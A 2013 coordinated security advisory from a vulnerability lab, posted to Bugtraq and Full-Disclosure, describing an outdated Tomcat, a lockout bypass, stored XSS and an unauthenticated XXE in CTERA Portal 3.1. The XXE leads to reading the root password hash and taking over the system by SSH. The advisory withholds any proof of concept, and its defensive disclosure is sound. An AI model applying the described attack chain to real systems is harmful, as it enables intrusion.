lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 5 Jun 2013 11:16:30 +0200
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: bugtraq <bugtraq@...urityfocus.com>, <full-disclosure@...ts.grok.org.uk>
Subject: SEC Consult SA-20130605-0 :: Multiple vulnerabilities in CTERA
 Portal

SEC Consult Vulnerability Lab Security Advisory < 20130605-0 >
=======================================================================
              title: Multiple vulnerabilities in CTERA Portal
            product: CTERA Portal
 vulnerable version: 3.1
      fixed version: 3.2
             impact: Critical
           homepage: http://www.ctera.com
              found: 2013-02-04
                 by: Stefan Streichsbier 
                     SEC Consult Vulnerability Lab 
=======================================================================

Vendor description:
-------------------
CTERA Portal is a scalable cloud service delivery platform that enables the 
creation, delivery and management of cloud storage applications, including 
file sharing and sync, backup, and mobile collaboration.

Full details: 
http://www.ctera.com/products/products/ctera-portal-cloud-storage-delivery


Business recommendation:
------------------------
By exploiting the XXE vulnerability, an unauthenticated attacker can get full 
read access to the filesystem of CTERA portal as root user and thus obtain 
sensitive information such as the root password hash from the /etc/shadow 
file, which, after being cracked in a short time, was revealed to be quite 
simple and presumably the same for all CTERA Portal installations.
Furthermore, by default it is possible to login as the root user using SSH, 
which potentially allows attackers to fully take over unsecured CTERA Portal
installations.


The recommendation of SEC Consult is to immediately upgrade to version 3.2 
and secure the SSH service by only allowing public key authentication.


Vulnerability overview/description:
---------------------------------------------
1.) Outdated Tomcat Version

The installed version of tomcat is outdated and several vulnerabilities are 
publicly known for it.

2.) Bypass of Temporary Account Locking

The main login functionality provides a security feature that temporarily 
locks the account after 5 failed authentication attempts. This can be 
bypassed by using the WEBDAV functionality which relies on HTTP Basic 
Authentication.

3.) Permanent Cross Site Scripting

The webdav functionality allows embedding of Javascript code in file names. 
This can be misused to e.g. upload a file with a specifically crafted filename
to a public shared folder that becomes accessible for each user of a certain 
group. If any other user accesses this shared public folder over the web 
interface that specific user account can be taken over.

4.) XML External Entity Injection

The used XML parser is resolving XML external entities which allows attackers 
to read files and send requests to systems on the internal network 
(e.g port scanning). The risk of this vulnerability is dramatically 
increased by the fact that it can be exploited by anonymous users without 
existing accounts and that the Tomcat server and thus the XML parser is 
running as root user. Attackers are able to read the root password hash from 
/etc/shadow and crack it within minutes. If the default SSH service 
configuration has not been secured, attackers can subsequently login to the 
CTERA portal via SSH as the root user and fully take over control of the 
system.


Proof of concept:
-----------------
Due to the potential impact, no proof-of-concepts are disclosed.


Vulnerable / tested versions:
-----------------------------
3.1


Vendor contact log:
------------------------
2013-02-26: Affected client sent report with vulnerability descriptions to 
vendor.
2013 March-May: Vulnerabilities have been analysed and a timeline for 
releasing patches has been scheduled. First round of patches has been 
published.
2013-06-05: SEC Consult releases coordinated security advisory.


Solution:
---------
Upgrade to version 3.2 and configure public-key-only authentication for SSH.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Secure your WordPress with MVIS Security Center!
https://www.sec-consult.com/en/Portfolio/Services/MVIS-Security-Center.htm

EOF Stefan Streichsbier / @2013

Powered by blists - more mailing lists